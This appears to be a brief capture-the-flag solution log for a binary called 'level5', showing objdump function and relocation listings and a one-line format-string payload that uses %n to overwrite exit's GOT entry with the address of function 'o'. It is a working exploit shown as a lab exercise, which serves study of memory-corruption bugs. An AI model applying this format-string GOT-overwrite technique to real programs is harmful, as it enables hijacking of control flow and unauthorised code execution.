
$ objdump -d `ls` | grep '<.*>:' | grep -v '<_.*>:'
08048370 <printf@plt-0x10>:
08048380 <printf@plt>:
080483a0 <fgets@plt>:
080483b0 <system@plt>:
080483d0 <exit@plt>:
08048480 <frame_dummy>:
080484a4 <o>:
080484c2 <n>:
08048504 <main>:


$ objdump -R ./level5
./level5:     file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049814 R_386_GLOB_DAT    __gmon_start__
08049848 R_386_COPY        stdin
08049824 R_386_JUMP_SLOT   printf
08049828 R_386_JUMP_SLOT   _exit
0804982c R_386_JUMP_SLOT   fgets
08049830 R_386_JUMP_SLOT   system
08049834 R_386_JUMP_SLOT   __gmon_start__
08049838 R_386_JUMP_SLOT   exit
0804983c R_386_JUMP_SLOT   __libc_start_main


print 0x080484a4
$5 = 134513828

cat <(python -c 'print "\x08\x04\x98\x38"[::-1] + "%134513824d"  + "%4$n"') - | ./level5
